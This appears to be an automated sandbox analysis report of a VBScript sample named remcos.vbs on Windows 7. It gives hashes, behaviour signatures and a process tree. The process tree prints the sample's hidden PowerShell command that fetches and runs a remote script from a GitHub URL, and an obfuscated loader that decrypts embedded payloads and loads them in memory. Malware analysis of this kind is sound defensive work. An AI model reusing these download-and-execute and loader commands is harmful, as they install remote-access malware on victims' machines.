Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    03-12-2024 22:37

General

  • Target

    remcos.vbs

  • Size

    563KB

  • MD5

    f7c17bfb4247e64e22dd52540a4b903b

  • SHA1

    368ba4d02df294fa42efee5e4f330d5e7260d0c3

  • SHA256

    23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622

  • SHA512

    5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4

  • SSDEEP

    12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\remcos.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3040
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2728
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2628
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 
6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "
          4⤵
            PID:2680
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2692

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\n1.bat

      Filesize

      562KB

      MD5

      d1d99208a499e870e1e0a34a2cbba829

      SHA1

      85f7090ce76bdae0a07154b27117ec5ac9e9f673

      SHA256

      d302c8c72b06785d8d4af94a118856907e3775becb17253ba62ccd3ddc669879

      SHA512

      badea3d061cdfd1c7929be03d0c4c66eb5cab3091740f935d58a601a56f5be6c372c3ae48bef6ef759581a5c4244885de1c5c02247391bfca7aee5c1c62d7497

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1KXKH7S10596SZ5GLS6N.temp

      Filesize

      7KB

      MD5

      d85e846afd2fcf5dde2fbbeabbfff705

      SHA1

      0c52f9c7bca9203333e2cf2e6d26c252f8322dda

      SHA256

      6d477eb4b026c67a9c935713e33980cd13898e2685e888deaccf49add312b6c0

      SHA512

      b7fe93ced3a42641795915730d8e614acde8aa536efa42c90de34b52ab40c2f75260d4ad5f3ad7d081dc5b24030dc135754234cde38075261542de93ec4fef9d

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/3040-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

      Filesize

      4KB

    • memory/3040-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

      Filesize

      2.9MB

    • memory/3040-6-0x0000000002040000-0x0000000002048000-memory.dmp

      Filesize

      32KB

    • memory/3040-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB

    • memory/3040-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

      Filesize

      9.6MB